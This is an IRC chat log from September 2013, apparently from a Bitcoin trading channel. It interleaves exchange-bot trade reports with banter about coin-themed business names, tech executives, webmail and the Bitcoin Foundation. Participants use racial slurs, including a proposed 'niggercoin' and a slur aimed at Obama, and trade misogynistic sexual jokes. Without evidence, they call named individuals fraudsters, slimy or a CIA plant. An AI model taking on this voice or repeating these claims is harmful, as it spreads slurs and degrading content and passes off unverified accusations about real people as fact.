such? *gasp* Sep 19 18:34:32 but again with the lazyness: I usually use paypal even whene there is a CC option, because I don't want to fetch my credit card Sep 19 18:34:46 jurov: no, just ask on IRC Sep 19 18:34:56 i use paypal exclusively because i know better than to share cc details over electronic systems. Sep 19 18:35:05 my cards were never used except in the atms. Sep 19 18:35:22 actually I'm probably more shy on IRC with the "asking stuff" part Sep 19 18:35:45 what asking anyway. you're paying. Sep 19 18:36:28 I never share CC with a random website, but with stores it's usually through a payment processor operated by a bank Sep 19 18:36:32 [HAVELOCK] [S] [AM100] 6 @ 0.017 = 0.102 BTC [-] Sep 19 18:36:58 anyway, i'm not of the coercive school of ip rights management. as far as i'm concerned there should be some fundamentally sound, lightweight drm in place. if you have the werewithal to circumvent that and find this is something you wish to do, hey. you're an independent agent with a mind of your own. Sep 19 18:37:04 I had to ask what I had to do to subscribe, because your blog does not even state it clearly Sep 19 18:37:31 oh I agree, it's doomed to fail in any case Sep 19 18:37:39 I paid because I wanted to Sep 19 18:37:49 so then. Sep 19 18:38:08 but it took tremendous effort! Sep 19 18:38:17 it works both ways, too. people who'd otherwise be too shy to approach me because of all my ranting feel encouraged when they want to buy something. Sep 19 18:38:27 then they discover i don't bite heads off and well... goes from there. Sep 19 18:38:34 possibly Sep 19 18:41:37 [HAVELOCK] [S] [HIM] 4 @ 0.18999 = 0.76 BTC [+] Sep 19 18:44:36 pankkake what tremendous effort anyway ? type /query mir/t ? Sep 19 18:44:52 yes Sep 19 18:45:38 you know too much isolation is unhealthy. Sep 19 18:46:42 [MPEX] [S] [S.MPOE] 8365 @ 0.00092846 = 7.7666 BTC [+] {2} Sep 19 18:47:24 damn what a retard buying s.mpoe shares Sep 19 18:48:34 oldest company in bitcoin dood. Sep 19 18:51:29 true, got any osbourne computer stock? Sep 19 18:52:03 nah Sep 19 18:52:24 i'm feeling riskay Sep 19 18:52:48 [BTCTC] [S] [LABCOIN] 632 @ 0.002552 = 1.6129 BTC [-] {2} Sep 19 18:53:49 [BTCTC] [S] [LABCOIN] 3087 @ 0.00254066 = 7.843 BTC [-] {8} Sep 19 18:56:52 [BTCTC] [FN] [BTC-GROWTH] 3 @ 0.09627666 = 0.2888 BTC [-] {2} **** BEGIN LOGGING AT Thu Sep 19 22:23:53 2013 Sep 19 22:25:01 few things like it, anyway Sep 19 22:25:05 benkay it's kinda funny for me to read you and bingobongo guy going at each other cause i know neither's an idiot Sep 19 22:25:13 i'm very partial to those charcoal shirts Sep 19 22:26:18 [BTCTC] [S] [ACTIVEMINING] 1424 @ 0.00226917 = 3.2313 BTC [-] {4} Sep 19 22:29:11 it's a lot less easy to procrastinate when it's quiet in here Sep 19 22:29:22 how so ? Sep 19 22:29:46 Coinvoice: Invoice in USD, receive BTC Sep 19 22:29:51 ^ worst name ever Sep 19 22:30:10 well, no conversation makes me feel like i should be doing work Sep 19 22:30:13 coinvoice, lel Sep 19 22:30:21 the coins speak to me Sep 19 22:30:35 every time there's a new btc thing with "coin" in the name, a part of me dies Sep 19 22:30:44 HOW CLEVER Sep 19 22:30:50 IT SEZ COIN Sep 19 22:32:05 i dont mind it in all cases Sep 19 22:32:08 but many, yeah Sep 19 22:32:21 it should have been bitboince. Sep 19 22:32:35 because b/v are ambiguous in like 1400. and so it'd be very clever yes? Sep 19 22:32:38 shoulda been fuckyoupayme Sep 19 22:32:40 boincevoice Sep 19 22:32:53 let's make dumb names. Sep 19 22:33:08 InceptionBit. The last billing service you'll ever use. Sep 19 22:33:20 binvoice Sep 19 22:33:21 Recepticoin Sep 19 22:33:23 because something Sep 19 22:33:28 blockunchained Sep 19 22:33:36 lel Sep 19 22:33:41 CoinSerious. Wallet service. Sep 19 22:33:44 unchained blockody Sep 19 22:34:04 iputcoinsinyourcoins.bro Sep 19 22:34:05 coinucopia Sep 19 22:34:11 faucet Sep 19 22:34:12 o no wait. coinesour. buy aussie wine with btc. Sep 19 22:34:18 ooh, i like Sep 19 22:34:32 countcoinula Sep 19 22:34:32 convict - bail bonds for btc Sep 19 22:34:39 coinvict, i mean Sep 19 22:34:46 ha Sep 19 22:34:48 seeing how connoisseur isn't spelled that way, you should. Sep 19 22:34:51 ahahaha convict rules. Sep 19 22:35:20 ThickAsThieves bitsincoins. maybe a food delivery ? Sep 19 22:35:56 kibbles & bits, animal food for btc Sep 19 22:35:56 we'll come up with better business ideas making up names than the people coming up with names making up businesses Sep 19 22:36:09 actually someone should make a comic staring LeCoin, the moustachy evil guy, Sep 19 22:36:18 hahaha damn straight. Sep 19 22:36:24 pepelecoin Sep 19 22:36:37 "sometimes, you gotta TAKE the wallets" Sep 19 22:36:44 NIOC - mirros delivered anywhere! Sep 19 22:37:14 IHOC - international house of coins Sep 19 22:37:20 CoinCon, the investment fund & more. Sep 19 22:37:34 coinhole Sep 19 22:37:37 coinca-cola Sep 19 22:37:38 o totally. Sep 19 22:37:40 lel Sep 19 22:37:44 hehe Sep 19 22:37:50 coin on the cob Sep 19 22:37:53 coinhole. selling corn on the cobb in 27 state fairs. Sep 19 22:38:02 coinography Sep 19 22:38:05 or a pub name Sep 19 22:38:11 yeah Sep 19 22:38:14 i'd drink at the coinhole Sep 19 22:38:17 coininthewall Sep 19 22:38:18 rabbit. quick downloads for btc. Sep 19 22:38:41 nubbins` it should be coinvct not convict Sep 19 22:39:03 nubbins`: convict - bail bonds for btc Sep 19 22:39:04 nubbins`: coinvict, i mean Sep 19 22:39:24 i read it that way originally but then on reread... SCANDAL! Sep 19 22:39:26 cointest Sep 19 22:39:26 autocorrect Sep 19 22:39:30 cointest! Sep 19 22:39:37 americasnexttopcoin Sep 19 22:39:42 autocoinrect. touchtype software. Sep 19 22:39:49 o that's good. Sep 19 22:39:55 realgoodvirtualcoin Sep 19 22:39:56 necromonicoin Sep 19 22:40:00 ! Sep 19 22:40:06 coindescending Sep 19 22:40:17 i am the great coinholio. Sep 19 22:40:17 book tables at snooty restaurants Sep 19 22:40:28 lol Sep 19 22:40:53 we're using up all the names, the VC's are fucked Sep 19 22:41:03 coinborn. cribs & baby shoes. Sep 19 22:41:05 all mine are available for licensing Sep 19 22:41:12 ThickAsThieves hence my evil plan *cackle* Sep 19 22:41:32 cointroduction Sep 19 22:41:35 dating site Sep 19 22:41:35 coinderwater Sep 19 22:41:57 coincum, your pet's best chum. Sep 19 22:41:58 coinworker, put rent-a-coder out of business Sep 19 22:42:05 nubbins` that's an actual service. Sep 19 22:42:15 lel, i was just gonna say Sep 19 22:42:25 coinsipid Sep 19 22:42:29 goiterbit. food supplements and special neckwear. Sep 19 22:42:36 HAH Sep 19 22:42:50 idodized salt & turtlenecks Sep 19 22:42:53 mannyscoinsandautoparts Sep 19 22:42:55 only items for sale Sep 19 22:43:13 "you bit it, you buy it". Sep 19 22:43:15 funeral services. Sep 19 22:43:39 coinjoined twins -- baby clothes for children with too many bodies Sep 19 22:44:02 cause what, they are deflationary ? Sep 19 22:44:12 coingroin hw wallet fannypacks Sep 19 22:44:24 coinwall, aluminum siding firm in cornwall, england. Sep 19 22:45:20 and also, maybe turkland renames istanbul back into coinstantinople-bit ? Sep 19 22:45:21 kakobrekla: hating on macs and a beavis and butthead reference? if you were a girl I'd give you coinilingus Sep 19 22:45:40 coinstantcontact Sep 19 22:46:01 lol Sep 19 22:46:27 i might sound like tits but it really is dick. Sep 19 22:46:30 coinversation next social media Sep 19 22:46:39 [HAVELOCK] [S] [HIM] 4 @ 0.18999 = 0.76 BTC [+] Sep 19 22:46:49 buzzword-keyword-coin Sep 19 22:47:03 social media & escort services. Sep 19 22:47:05 hashcoin? Sep 19 22:47:37 blotterbit. buy your lsd for cheap! Sep 19 22:48:03 hash hash - dual purpose miner / vaporizer Sep 19 22:48:12 bitbybit dentures Sep 19 22:48:20 ha! Sep 19 22:48:34 both potheads and miners have high electric consuption. makes sense to combine Sep 19 22:48:39 Triple Coin. All-bitcoin horse racing. Sep 19 22:48:41 coinsumption Sep 19 22:48:55 coinception Sep 19 22:49:07 coink. pig farm in oregon. Sep 19 22:49:28 bitness protection program Sep 19 22:49:34 lol Sep 19 22:49:40 that'd be a good wallet. Sep 19 22:49:53 dude we gotta stop, we created more value than the ipo market in the past six months. Sep 19 22:50:26 if we keep going, people are going to start trying to exchange XBOND for it Sep 19 22:50:33 i think my fave so far was necromonicoin, someone make that an altcoin plz Sep 19 22:50:43 lol Sep 19 22:50:59 im personally holding out for niggercoin Sep 19 22:51:00 necronomicoin, blockchain-based pandemic tracking Sep 19 22:51:04 the alt to end all racism. Sep 19 22:51:12 haven't seen any vampire/goth/etc. related altcoin actually. sad Sep 19 22:51:20 yeah Sep 19 22:51:22 super sad Sep 19 22:51:25 pankkake well we're too mainstream for goth Sep 19 22:51:29 have an emocoin Sep 19 22:51:33 youll feel better Sep 19 22:51:39 bitemo! Sep 19 22:51:44 emoticoin! Sep 19 22:51:54 emoticoin Sep 19 22:51:56 ooh Sep 19 22:51:59 you beat me to it Sep 19 22:52:21 hashtronomical - telescopes and sky charts for btc Sep 19 22:52:33 brb fresh air break Sep 19 22:52:35 by the way I have an idea for an altcoin but I am too lazy to figure out how to create it (there is nothing to gain, it would be designed as unpreminable because of its stupid design) Sep 19 22:52:39 bitinstant coffee Sep 19 22:52:42 the name is great too Sep 19 22:52:48 maybe I'll wait for april 1st Sep 19 22:53:06 bitstamp stamps Sep 19 22:53:19 bitstamp stamps would turn into a ponzi Sep 19 22:53:24 coindesk desks Sep 19 22:53:28 Charles Ponzi would come back from the dead and pretend to send them. Sep 19 22:53:28 so i bought walnuts. huge things cause fresh. i crack one, worm in it says HI! crack another, some sort of weird moth thing. Sep 19 22:53:31 bittramp stamps Sep 19 22:53:34 im looking at the 3rd and thinking... chicken ? Sep 19 22:54:00 you really need awkward names Sep 19 22:54:05 like coinffee Sep 19 22:54:06 lol, the worst I had was just walnuts full of dirt Sep 19 22:54:19 ah well, romanian food Sep 19 22:54:37 you'll find a horse, not chicken, in the next walnut Sep 19 22:54:57 http://articles.latimes.com/1994-08-12/news/mn-26407_1_condom-inside Sep 19 22:55:00 Canadian Woman Finds Condom in Walnut - Los Angeles Times Sep 19 22:55:01 a horse does not fit in a nut therefore your argument is coinvalid. Sep 19 22:55:29 coinvalid sounds ultra-valid Sep 19 22:55:31 hm Sep 19 22:55:36 or very ill Sep 19 22:55:36 coinvalid: home care services Sep 19 22:55:38 coinvestment Sep 19 22:56:08 romanian guy finds coindom in walnut Sep 19 22:56:09 coinmorbidity. Sep 19 22:56:16 my coindom for a horse Sep 19 22:56:25 :D Sep 19 22:56:25 i am a coindom! you kidding me ? Sep 19 22:56:29 all my slavebits! Sep 19 22:56:40 do they have big bits? Sep 19 22:56:50 as far as possible. Sep 19 22:56:53 with big ripples? Sep 19 22:56:57 sensitive ripples Sep 19 22:56:58 lol Sep 19 22:57:06 lel Sep 19 22:57:08 actually big tits do have a ripple. Sep 19 22:57:13 my ripples are rock-hard Sep 19 22:57:16 knitbit textiles Sep 19 22:57:18 have the girl on her back and slap the tit Sep 19 22:58:41 coinbred Sep 19 22:59:08 coinbread Sep 19 22:59:18 coinbit /thread Sep 19 22:59:21 coinbred is like, pastry or conception support ? Sep 19 22:59:31 coin + inbred Sep 19 22:59:58 the chickoin shack Sep 19 23:00:01 drillbit Sep 19 23:00:08 icedrill Sep 19 23:00:11 ;p Sep 19 23:00:29 bitcramp - providing maxi pads for BTC Sep 19 23:00:37 saybitaintso - scam reports Sep 19 23:00:43 ok, ovens are heated up, gotta print a dozen shirts Sep 19 23:00:45 SOMEBODY TIME ME Sep 19 23:01:13 ;;echo go for it pizza boy! Sep 19 23:01:14 go for it pizza boy! Sep 19 23:01:18 bitsnotatumor Sep 19 23:01:54 [HAVELOCK] [S] [AM100] 6 @ 0.017 = 0.102 BTC [-] Sep 19 23:01:59 here's a bittramp stamp: https://lh3.ggpht.com/-NKixDgBe9dI/ThvMeY-Qo6I/AAAAAAAAAt4/kx985Qd3UZI/s640/bitcoin-tattoo-2.jpg Sep 19 23:02:44 bittitude Sep 19 23:03:08 bitlip - body jewelry Sep 19 23:03:14 bitanic Sep 19 23:03:27 gay dating site? Sep 19 23:03:35 bisexual* Sep 19 23:03:39 is that a really badly done tattoo or am i just unexpert ? Sep 19 23:03:52 bitcoinsexchange.com (later a hyphen is added to clear things up, bitcoins-exchange.com) Sep 19 23:03:54 oh. bite in French means cock so… :) Sep 19 23:03:59 its a areally bad everything Sep 19 23:04:01 ick Sep 19 23:04:05 deizel ok that ones pretty good. Sep 19 23:04:20 lol Sep 19 23:04:37 mircea_popescu: seems bad Sep 19 23:04:51 bitthedust - cremation service Sep 19 23:04:52 mircea_popescu: bingoboingo and i were doing performance co-trolling last night Sep 19 23:05:00 must be hard not to move when tatooed there though Sep 19 23:05:12 benkay a that's what it iwas. Sep 19 23:05:24 pankkake why ? pubic shield dones't hurt much. Sep 19 23:05:41 bitthehandthatfeedsyou - welfare dist Sep 19 23:05:58 it's kind of ticklish Sep 19 23:06:42 bitslikeaglove - condoms Sep 19 23:06:59 I CNAT STOP Sep 19 23:07:15 coinstop. Sep 19 23:07:19 bitplug Sep 19 23:07:38 they totally gotta put those usb sticks in dildos already Sep 19 23:07:54 they would burn you Sep 19 23:07:54 we could breed bitbulls Sep 19 23:07:55 bittheroadjack - divorce attorney Sep 19 23:08:24 pankkake: dat fine line between pain and pleasure :) Sep 19 23:08:30 pankkake they get that hot ? i doubt it. have you SEEN how hot girls get down there man ?! Sep 19 23:08:48 the usb sticks really burn my fingers Sep 19 23:09:10 dontbitwhereyoueat - litter boxes Sep 19 23:09:27 hm Sep 19 23:09:55 after brain damage from gpu waste heat, vaginal burns from usb asic miner dildo would defo put us on the map. Sep 19 23:10:15 recycle bit Sep 19 23:10:27 mircea_popescu: glue a Stirling engine to the asic, convert heat to vibration... Sep 19 23:10:28 bint lol. Sep 19 23:10:32 thatbitsthespot - vibrators Sep 19 23:10:41 asciilifeform bitachi! Sep 19 23:12:00 fruitofmycoins Sep 19 23:13:03 or simply: bitch Sep 19 23:13:40 naughtybits Sep 19 23:14:09 if anyone wonders how a stirling engine looks : http://upload.wikimedia.org/wikipedia/commons/b/b2/BetaStirlingTG4web.svg Sep 19 23:14:16 seems perfectly adequate for the application. Sep 19 23:16:53 flatliners! http://www.latimes.com/science/sciencenow/la-sci-sn-brain-activity-death-20130918,0,4315042.story Sep 19 23:17:40 the phallic resemblance can't be a coincidence Sep 19 23:18:23 who can forget, http://gizmodo.com/5466997/the-steam+powered-vibrator-and-other-terrifying-early-sex-machines-nsfw Sep 19 23:18:25 lol microsoft really is taking Elop? Sep 19 23:18:42 really? Sep 19 23:18:56 then my question would be… but who is going to buy microsoft? Sep 19 23:19:13 lesbians Sep 19 23:19:31 why lesbits? Sep 19 23:19:45 cause they dont like it big and hard Sep 19 23:19:53 http://www.theverge.com/2013/9/19/4748738/nokias-stephen-elop-to-make-more-than-25-million-for-jumping-to-microsoft Sep 19 23:19:55 Nokia's Stephen Elop to make more than $25 million for jumping to Microsoft | The Verge Sep 19 23:19:58 ooh Sep 19 23:20:01 nic arb Sep 19 23:20:03 nice* Sep 19 23:20:27 ThickAsThieves: rofl you couldn't make this up Sep 19 23:20:30 so funny Sep 19 23:21:06 "He'll be leading up Microsoft's expanded devices division when the acquisition is complete, but given that there's a recently vacated CEO position at Redmond there's the possibility of even greater rewards in Elop's future." Sep 19 23:21:06 the guy gets millions for ruining companies Sep 19 23:21:15 how can this exist Sep 19 23:21:31 nokia shareholders must be mad as hell Sep 19 23:21:47 he probly has nudes of god Sep 19 23:21:52 gotta parachute those execs man Sep 19 23:22:01 'cause they've worked for it Sep 19 23:22:56 he has the password to Nokia Sep 19 23:23:01 and wouldnt share it Sep 19 23:23:11 wut Sep 19 23:23:16 hehe Sep 19 23:23:25 ruining some companies is a public service Sep 19 23:23:28 like microsoft. Sep 19 23:23:49 thats one way to look at it Sep 19 23:23:55 i don't understand any of these tech companies anymore except google Sep 19 23:23:57 but couldnt they ruin it faster? Sep 19 23:24:02 and google just wants to do crazy shit Sep 19 23:24:10 google wants to do ALL shit Sep 19 23:24:21 i was glad yahoo got that chick what's her face, i was sad microsoft is replacing balmer, but if it's elop... Sep 19 23:24:25 their walls are made of noodles Sep 19 23:24:26 i guess if you aren't being like a technical innovator at life Sep 19 23:24:30 and solving life problems Sep 19 23:24:32 you're old hat Sep 19 23:24:55 yeah Yahoo getting Marissa was good Sep 19 23:24:59 microsoft needs to solve a need to become relevant again Sep 19 23:25:05 same for yahoo Sep 19 23:25:11 i'll miss chair-throwing monkey boy Sep 19 23:25:21 yahoo is probly mopping up internally first Sep 19 23:25:24 jcpham yahoo has pretty much all the world's yahoos Sep 19 23:25:31 maybe next year we'll see bigger moves Sep 19 23:25:32 hahaha Sep 19 23:25:34 i still fidn this hard to believe, but > 90% of rtomanians have yahoo email. Sep 19 23:25:47 my server just drops mail with "yahoo" in headers. Sep 19 23:26:08 this includes my mother's only email address, and pretty much any romanian company out there. Sep 19 23:26:18 and the French have hotmail - thankfully a thing of the past but… Sep 19 23:26:20 lol Sep 19 23:26:24 yeah my wife has a yahoo email address Sep 19 23:26:25 texas-local-television@yahoo.com happens here. Sep 19 23:26:31 jcpham kill her. Sep 19 23:26:33 and surprising i know lots of peeps with them still Sep 19 23:26:42 i have one too but haven't logged in in years Sep 19 23:26:53 does aol still have email? Sep 19 23:26:54 it must be the webmail niche still Sep 19 23:27:02 ThickAsThieves yup Sep 19 23:27:05 because yahoo was one of the first to offer that Sep 19 23:27:13 seems like that should be a collectible Sep 19 23:27:17 aol email addies Sep 19 23:27:18 i think it is Sep 19 23:27:25 then they got into competetion with storage space and stuff if you remember Sep 19 23:27:29 oldscjhool by now. weirdo retired uni profs have them Sep 19 23:27:31 who's webmail had the most free shit Sep 19 23:27:38 yahoo was on top of that race until gmail Sep 19 23:28:00 hotmail/outlook web mail looks pretty nice now Sep 19 23:28:03 i still wont use it tho Sep 19 23:28:23 AOL lives, still. there even remain rural pestholes in the U.S. where they're the only game in town. Sep 19 23:28:38 that's crazy Sep 19 23:28:41 (well, that and iridium sat) Sep 19 23:28:42 i bet dialup too Sep 19 23:28:46 $email Sep 19 23:28:47 ThickAsThieves: To sign up for this service, contact smickles. Cost will be 0.01 BTC. Sep 19 23:29:17 how to know you're not really in the us Sep 19 23:29:21 [BTCTC] [S] [ASICMINER-PT] 2 @ 1.857 = 3.714 BTC [-] {2} Sep 19 23:29:26 mpexbot works for nsa btw Sep 19 23:29:37 kakobrekla omfg stop spreading fudlies Sep 19 23:29:39 http://youtu.be/e8M6S8EKbnU?t=1m9s amazing company! Sep 19 23:29:39 AMAZING COMPANY! Sep 19 23:29:42 The best of Steve Ballmer - YouTube Sep 19 23:30:07 assbot should ocasionally say "amazing company your mom is" Sep 19 23:30:21 god that video is horrible Sep 19 23:30:35 4x6 px Sep 19 23:32:57 while True: developers Sep 19 23:33:31 Is Bitcoin the Beginning or the End of Banking as we know it? ~reddit Sep 19 23:33:46 Yes! Sep 19 23:33:55 let's ask the same question every day ~reddit Sep 19 23:34:13 cats ~reddit Sep 19 23:34:20 i like the fact that I can buy a 6500k off the grid solar tie in kit for 48 bitcoins Sep 19 23:34:53 i'm waiting on the price to drop to a few btc before i jump into solar Sep 19 23:35:06 solar is out Sep 19 23:35:29 no one sells mr fusion Sep 19 23:35:36 pre-order only :( Sep 19 23:35:42 lmao these names Sep 19 23:36:00 i literall just today registered livestocks.me Sep 19 23:36:08 it *will* be used ;) Sep 19 23:36:14 am both totally and totally not interested in this article http://www.riabiz.com/a/24063560/how-the-winklevoss-twins-presence-at-a-big-nyc-hedgie-event-cut-the-torpor-and-distracted-from-the-poor-job-most-hedge-funds-are-doing-for-clients Sep 19 23:36:26 i assume it sucks Sep 19 23:36:47 you know, not a single fuckable chick i ever talked to had a reddit. Sep 19 23:36:50 you're ambitvalent? Sep 19 23:37:07 nope. Sep 19 23:37:16 jurov, but it has no coinbits in the name? Sep 19 23:37:18 it was for TAT Sep 19 23:37:22 how will you get VCs? Sep 19 23:37:29 no, but it has sheep Sep 19 23:37:53 oh, it's not a sex slave market? Sep 19 23:38:08 ain't need no filthy VCs Sep 19 23:38:40 i'm probly late to this realization, but yesterday it occurred to me that the Bitcoin Foundation is worse than just being a bunch of cointreprenuers Sep 19 23:39:04 it's a shell org to act as catchall for for VC opportunities Sep 19 23:39:11 ThickAsThieves: worse Sep 19 23:39:15 by offering grants Sep 19 23:39:27 tomorrow you'll wake up to further realisations, Sep 19 23:39:43 and then i'll be an asshole and link you to 2012 and well... Sep 19 23:39:48 ThickAsThieves: it publicly joined a traitorous 'NSA club' Sep 19 23:40:12 lol'd at trace meyer endorsements Sep 19 23:40:16 if there's one thing we can count on mp, it's that tomorrow when we wake up you'll still be an asshole Sep 19 23:40:17 it's grup of kids cooperating to avoid doing their homework as mircea nicely put it Sep 19 23:40:23 :) Sep 19 23:40:26 mr. how to disappear wants to be on the board Sep 19 23:40:34 lol Sep 19 23:40:35 seems hypocritical Sep 19 23:40:43 asciilifeform it was made by well known vc circuit fraudster vesseness. it collected "donations". it used said donations to prop ycombinator-driven "businesses", that incidentally never got anywhere. what did you expect it to do next ? Sep 19 23:41:02 try and recycle more average-stupid-american into "relevancy", package it and sell it. Sep 19 23:41:14 hi Sep 19 23:41:16 support bfl scammers while that was good, pretend it never did afterwards, the way shit works. Sep 19 23:41:29 mircea_popescu: so where's the authoritative 'clean' bitcoind fork? Sep 19 23:41:41 i am not at liberty to discuss. Sep 19 23:41:41 the Trace guy like pre-announced his Armory investment via board debates Sep 19 23:41:49 was very slimey Sep 19 23:42:29 Armory having received BitFoundation grant money Sep 19 23:42:36 Trace running for board Sep 19 23:42:43 birds, feathers Sep 19 23:42:44 all coincidental Sep 19 23:42:59 coincidental indeed. Sep 19 23:43:05 so of course i must join board next Sep 19 23:43:12 joerg wants to be hardcore Sep 19 23:43:16 front run teh IPOz! Sep 19 23:43:35 so if you want to be on the board you need to be a talking head Sep 19 23:43:47 and make "someone has a gun to your head" youtube videoa Sep 19 23:43:59 memories: Sep 19 23:44:04 all that stuff Sep 19 23:44:06 mircea_popescu: seems like bitcoind users are 'setting themselves up the bomb' by running the foundation's crap - sooner they quit, the better Sep 19 23:44:24 http://imgur.com/1GJRHGd Sep 19 23:44:24 jcpham yes. as long as you speak american, in order to be anything anywhere within the structure you have to be a talking head. that's the thing. thats why obama's not black, even if he is a nigger. Sep 19 23:44:26 imgur: the simple image sharer Sep 19 23:44:40 i get the talking head thing Sep 19 23:44:47 i used to make fun of them but i get it now Sep 19 23:45:01 what happened to you, got married ? Sep 19 23:45:30 asciilifeform it makes relatively little difference what the dust bitcoiners are running. Sep 19 23:45:38 witnessed enough idiocy in action that leads to further opportunities Sep 19 23:45:40 yes Sep 19 23:46:01 in a sense it's good that they follow the crud, self limiting disease on both ends. Sep 19 23:46:18 it's really not even important if you know what you are talking about Sep 19 23:46:24 and it doesn't even need to be true Sep 19 23:46:33 you just need enough media and TV to expose you Sep 19 23:46:56 "need". Sep 19 23:48:02 horse-head SCRYPT.ASIC bitfunder IPO youtube video Sep 19 23:48:04 gogogog Sep 19 23:48:13 mircea_popescu: sure btc is ready to lose the chump money collector that is the 'dust' users? Sep 19 23:49:27 asciilifeform it won't be btc. the beauty is that we're perfectly severable. i just sit here and wait, and the scammers build themselves up. when their building becomes unsustainable for them, i cut their rope and they choke. Sep 19 23:49:48 so, dust collectors follow the qt. at some point the qt is used to deliver some value away from the users. i say so, and point to bf. end of story. Sep 19 23:50:03 this is why bitcoin destroys the welfare system : because it is a strictly bound system. Sep 19 23:50:08 one thing is certain Sep 19 23:50:11 welfare needs eternally expanding system. Sep 19 23:50:15 lizzy ploshay is a CIA plant Sep 19 23:50:29 but as long as i have the total energy and it's fixed, you can't run fake perpetuum mobiles. Sep 19 23:50:40 if the chumps decamp en masse, btc might end up as a Hawala for a dozen people. Sep 19 23:50:42 [MPEX] [S] [S.MPOE] 21770 @ 0.00093426 = 20.3388 BTC [+] {4} Sep 19 23:50:53 they don't decamp btc. they decamp obama, go vote rumsfeld or w/e Sep 19 23:50:54 as IF. Sep 19 23:51:50 i can't help but suspect that bitcoind-as-we-know-it is only a Schelling point b/c virtually no one understands the code Sep 19 23:52:23 this would be a step this way from what i recall your last position, which was that it isn't. Sep 19 23:53:01 mircea_popescu: i still think that in the abstract it isn't, given that there's nothing magic about the code (quite a few people, myself included, have understood it) Sep 19 23:53:28 it's a schelling point exactly because it introduces hard binds on the system of everyrthing. Sep 19 23:53:32 a great many interesting things could be done (bring back the turing-complete 'script' engine, for one) Sep 19 23:53:41 these can then be used to make the spinning lying circus the us brought us impracticable. Sep 19 23:53:45 [BTCTC] [S] [LABCOIN] 43 @ 0.002637 = 0.1134 BTC [+] Sep 19 23:53:50 much like the reason it never arose earlier, say in england. Sep 19 23:54:05 in fact, the french revolution TRIED. hard. it failed, and it failed because the hard bounds of that system sunk them. Sep 19 23:54:07 ie, gold. Sep 19 23:54:37 mircea_popescu: you underestimate the tenacity of the circus clowns; they'll continue with Zimbabwean fiat if they have to Sep 19 23:54:43 tenacity is irrelevant. Sep 19 23:54:54 nobody was mroe tenacious than la grande armee Sep 19 23:55:09 but in the end, if you don't have it you don't have it and that's the end of the story. Sep 19 23:55:29 so where's the kutuzov for the anglo bonaparte? Sep 19 23:55:56 you'll find out when they invade russia. Sep 19 23:56:07 you didn't know who kutuzov was before the event. Sep 19 23:57:31 anyway, the notion that lies enact reality are no different from the earlier socialistoid propositions that work enacts currency, as brought by hitler in the 30s and by the various revolutionaires right before the empire. Sep 19 23:57:52 they're both false, in the sense of that quote, that useful work is limited but useless work infinite. Sep 19 23:58:46 The next asicminer! https://bitcointalk.org/index.php?topic=297334.msg1521109;topicseen#new Sep 19 23:59:18 the fuhrer's playground didn't exactly go broke and keel over on its own accord. Sep 19 23:59:31 The HotAir Mining Company Sep 20 00:00:23 Sun Fart Mining Sep 20 00:00:28 asciilifeform it did go broke. Sep 20 00:00:51 moderated topic, can't do a "reserved" I guess Sep 20 00:00:51 ;;nethash Sep 20 00:00:52 [HAVELOCK] [S] [CBTC] 250 @ 0.000402 = 0.1005 BTC [-] Sep 20 00:00:52 993830.229432 Sep 20 00:01:13 we could just spam the thread with Reserved posts Sep 20 00:01:25 or rather, Amazing company! Sep 20 00:01:26 AMAZING COMPANY! Sep 20 00:01:30 or pictures of milk Sep 20 00:01:50 or mp on a horse meme Sep 20 00:01:52 lol Sep 20 00:02:08 actually milk trollage has the advantage that it's so wtf nonsensical the noob scammer is likely to try and entertasin it. Sep 20 00:02:15 because they never do their fucking homework, they always just asume. Sep 20 00:02:25 and so... ask them if they are lactose intollerant Sep 20 00:02:34 and what do they think about also getting into the milk buysines Sep 20 00:03:12 google image search for "mircea popescu on a horse" is pretty odd Sep 20 00:03:23 the sharpie ass comes up Sep 20 00:03:31 a naked lady Sep 20 00:03:51 a horse penis Sep 20 00:04:16 the usual i guess Sep 20 00:04:57 lol Sep 20 00:05:28 i see a pig, the fixed portrait of jesus Sep 20 00:05:38 hehe, fixed Sep 20 00:05:57 [BTCTC] [S] [LABCOIN] 142 @ 0.00242772 = 0.3447 BTC [-] {4} Sep 20 00:10:01 [HAVELOCK] [S] [CBTC] 50000 @ 0.00040059 = 20.0295 BTC [-] {5} Sep 20 00:12:11 http://socialsafe.files.wordpress.com/2012/08/last-supper-restoration.jpg Sep 20 00:13:05 yah, that. Sep 20 00:19:10 [BTCTC] [S] [LABCOIN] 108 @ 0.002431 = 0.2625 BTC [-] Sep 20 00:21:40 asciilifeform http://trilema.com/2013/digging-through-archives-yields-gold/ Sep 20 00:21:41 "There’s a catch though : pretty much all this infernal machinery of doom depends upon the continual, endless and unavoidable debasement of the currency. If inflation is no longer a fact, if avoiding it becomes not common but even possible, nothing in the grand scheme of socialism works anymore. Nothing at all, everything depends on that." Sep 20 00:25:16 [BTCTC] [S] [LABCOIN] 68 @ 0.00243152 = 0.1653 BTC [+] {2} Sep 20 00:26:32 socialism sounds a lot like the mining scene Sep 20 00:27:05 satoshi just took the inflation out of the money and put it into the difficulty Sep 20 00:27:39 diff has nothing to do with ammt of money printed Sep 20 00:27:49 ya srsly i don't fgollow that reasoning Sep 20 00:28:29 ity wasnt exactky meant to be apt Sep 20 00:30:07 meanwhile: http://imgur.com/aGVVKWE Sep 20 00:30:15 shoulda worn some sunglasses! Sep 20 00:30:21 [HAVELOCK] [S] [HIM] 6 @ 0.18999 = 1.1399 BTC [+] Sep 20 00:31:08 lmao Sep 20 00:31:37 i am of surprised nobody made a penis one Sep 20 00:32:12 That is in TAT's private archive Sep 20 00:32:48 lol Sep 20 00:38:37 http://i.imgur.com/RQJqOXY.jpg Sep 20 00:39:16 admittedly, i think i used up all my creativity for the day on coinbit names Sep 20 00:42:33 [BTCTC] [S] [ASICMINER-PT] 10 @ 1.812 = 18.12 BTC [-] Sep 20 00:44:06 these pretzels are making me thirsty. Sep 20 00:45:49 incidentally : i wonder if american ppls are better than romanians at americana. Sep 20 00:45:50 http://trilema.com/2011/test-de-americana/ Sep 20 00:45:53 Test de Americana pe Trilema - Un blog de Mircea Popescu. Sep 20 00:45:53 that was never solved. Sep 20 00:46:12 (question is, which town and coming from where is the pic) Sep 20 00:50:42 [BTCTC] [S] [LABCOIN] 2625 @ 0.00243023 = 6.3794 BTC [-] {3} Sep 20 00:50:56 http://www.radarnoticias.com/painel/modulos/galerias/pastas/2012-05-15_1337094462/1337094490602.jpg slightly disturbing image search hit for that Sep 20 00:51:43 [BTCTC] [S] [ASICMINER-PT] 4 @ 1.86099999 = 7.444 BTC [+] {4} Sep 20 00:51:54 https://products.butterflylabs.com/homepage-new-products/1-gh-cloud-hosted-bitcoin-hashing-power.html 